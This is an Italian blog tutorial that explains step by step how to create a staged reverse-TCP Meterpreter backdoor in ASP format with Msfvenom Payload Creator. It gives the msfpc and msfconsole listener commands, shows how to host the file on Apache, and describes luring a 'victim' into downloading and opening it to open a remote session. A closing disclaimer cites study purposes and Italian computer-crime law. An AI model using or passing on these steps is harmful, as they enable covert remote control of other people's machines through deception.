In questo tutorial parleremo della windows-meterpreter-staged-reverse-tcp-443.asp, appartenente alla serie di backdoor di Msfvenom Payload Creator, famoso tool contenuto in Kali Linux. Già in un precedente articolo abbiamo parlato del windows-meterpreter-staged-reverse-tcp, ma nel caso che stiamo analizzando in questo articolo, il file della backdoor avrà un estensione in ASP. Bene, fatta la premessa possiamo partire; i procedimenti sono sostanzialmente sempre gli stessi, che utilizziamo oramai da tempo nei miei tutorial. Come primo passo aprire il Payload Creator andando nel percorso Applicazioni>Strumenti di exploiting>Msfvenom Payload Creator. Una volta che la console del tool sarà startata, possiamo procedere con i vari comandi;

/usr/bin/msfpc verbose loop “tuo indirizzo ip”

 

 

 

 

 

 

serve per creare, nella cartella Home del nostro PC, tutte le backdoor che ci mette a disposizione MPC , tra di queste appunto quella che serve a noi.

Per eseguire questo primo comando è richiesto l’inserimento del nostro indirizzo IP, per ottenerlo basterà digitare, su di un nuovo terminale, il comando “ifconfig”.

 

 

 

 

 

 

Il secondo comando che manderemo in esecuzione sarà msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-443-asp.rc’

 

 

 

 

 

 

 

che avrà il compito di richiamare la console di Metasploit Framework; terminato il processo di apertura di Metasploit, il terminale si metterà in ascolto.

Ora viene il bello; per prima cosa dobbiamo andare nella cartella Home e trovare il file windows-meterpreter-staged-reverse-tcp-443.asp, ovvero la backdoor che servirà per l’attacco.

 

 

 

 

 

 

 

Una volta trovata dobbiamo trasferirla nel percorso Computer>var>www>html.

 

 

 

 

 

 

 

Quindi possiamo anche procedere con il comando service apache2 start.

 

 

 

 

 

 

La parte più importante viene quando dobbiamo creare un link che avrà la seguente struttura:

“nostro indirizzo ip”/windows-meterpreter-staged-reverse-tcp-443.asp

dove al posto di “nostro indirizzo ip” andremo appunto ad inserire l’indirzzo IP che abbiamo precedentemente ricavato con il comando ifconfig.

Il link dovrà essere cliccato da parte della vittima; fatto ciò le apparirà una richiesta di download e il file dovrà essere scaricato e poi aperto; una volta aperto si stabilirà una connessisone tra il nostro PC e il dispositivo che stiamo attaccando.

 

 

 

 

 

 

 

 

Se siete riusciti a creare una sessione di comunicazione, ma non ricordate i comandi, potete sempre far uso del comando “help” il quale va digitato nella stessa console in ascolto di Metasploit.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un’ incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).